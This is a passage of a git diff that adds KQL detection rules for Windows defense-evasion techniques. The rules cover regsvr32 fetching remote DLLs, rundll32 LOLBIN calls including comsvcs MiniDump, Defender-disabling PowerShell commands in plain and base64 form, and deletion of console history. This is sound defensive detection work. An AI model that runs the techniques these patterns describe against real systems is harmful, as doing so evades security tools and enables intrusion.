or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql new file mode 100644 index 00000000..0ccc5bc1 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-24 +// Level: medium +// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql new file mode 100644 index 00000000..dcfeef7f --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - FQDNs that start with a number such as "7-Zip" + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql new file mode 100644 index 00000000..ae6e77df --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Rundll32 Activity +// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql new file mode 100644 index 00000000..362e2577 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File +// Author: @kostastsale +// Date: 2024-08-16 +// Level: medium +// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. +Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 +// False Positives: +// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql new file mode 100644 index 00000000..33c0cdf3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load +// Author: frack113 +// Date: 2023-02-17 +// Level: medium +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql new file mode 100644 index 00000000..8151d305 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql @@ -0,0 +1,13 @@ +// Title: Potentially Suspicious WDAC Policy File Creation +// Author: X__Junior +// Date: 2025-02-07 +// Level: medium +// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Administrators and security vendors could leverage WDAC, apply additional filters as needed. + +DeviceFileEvents +| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql new file mode 100644 index 00000000..6f2558fb --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Windows App Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-12 +// Level: medium +// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate packages that make use of external binaries such as Windows Terminal + +DeviceProcessEvents +| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql new file mode 100644 index 00000000..2806782f --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Wuauclt Network Connection +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: medium +// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. +One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents +| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql new file mode 100644 index 00000000..f545b0d6 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded FromBase64String Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-24 +// Level: high +// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql new file mode 100644 index 00000000..564d3923 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql @@ -0,0 +1,10 @@ +// Title: Powershell Base64 Encoded MpPreference Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-04 +// Level: high +// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql new file mode 100644 index 00000000..77b323a6 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Console History Logs Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceFileEvents +| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql new file mode 100644 index 00000000..7fdd5b39 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Core DLL Loaded Via Office Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects PowerShell core DLL being loaded by an Office Product +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceImageLoadEvents +| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql new file mode 100644 index 00000000..ed0c9d81 --- /dev/null +++ b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql @@ -0,0 +1,13 @@ +// Title: Powershell Defender Disable Scan Feature +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-03 +// Level: high +// Description: Detects requests to disable Microsoft Defender features using PowerShell commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible administrative activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains 